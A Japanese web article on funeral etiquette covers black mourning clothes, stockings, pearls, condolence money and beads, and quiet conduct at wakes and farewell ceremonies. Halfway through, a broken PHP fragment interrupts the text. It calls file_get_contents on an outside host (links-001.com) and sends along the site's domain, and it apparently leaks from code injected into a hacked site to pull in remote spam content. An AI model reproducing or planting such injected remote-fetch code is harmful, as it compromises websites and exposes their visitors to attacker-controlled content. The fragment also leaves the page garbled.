前へ
次へ

基本的な葬儀マナーを身に付けておきたい

20歳以上の大人になると、就職やアルバイト、結婚などを経験して交友関係が増えてきます。
訃報は突然入ってくるので、いざという時に慌てないために、葬儀マナーを身に付けておく必要があります。
お通夜や告別式に参列をする時は、服装のマナーを知っておく必要があります。
男女共に黒の喪服を着用します。
女性の場合は肌の露出を抑えた、上品で落ち着いたデザインの喪服を選ぶことが大事です。
スカート丈は膝が隠れるぐらいの長さで、スリットが入っていない商品がお勧めです。
暑い時期の葬儀の場合でも、半袖を着用するのはマナー違反です。
下に着用するワンピースは半袖でも良いですが、ジャケットなどの羽織物を着用することが大事です。
暑い時期は涼感素材の商品が販売されているので、一枚は購入しておくと便利です。
靴やバッグは光沢の入っていない、落ち着いた黒を選んで下さい。
暑い時期でも素足は厳禁なので、必ず黒のストッキングを着用するのがマナーです。
お通夜や告別式などの葬儀に参列をする時は、香典と数珠は必ず持参することが大事です。
携帯電話はマナーモードにしておくか、電源を切っておくことが大事です。
斎場に入ったら、カードに記入をしてから、受付で香典を手渡します。
寒い時期はマスクを着用する人も多いですが、受付をする時や、お焼香をする時は外すのがマナーです。
基本的な葬儀マナーを知っておくと、恥をかかなくて済みます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

お通夜や告別式は、悲しみの席なので、友人や知人に会った時も大きい声で話をするのは避けて下さい。
男性の服装のマナーは、白のYシャツに黒のネクタイ、靴下を着用します。
男性の場合は黒の喪服であれば問題はありません。
靴や喪服に汚れが付いていないか、外出をする前にチェックをしておきましょう。
女性は黒か白の真珠のネックレスを着用します。
結婚指輪は付けても良いですが、装飾性の高いファッションリングは避けたほうが無難です。
長い髪の毛の人は、きちんと束ねておくことが大事です。

Page Top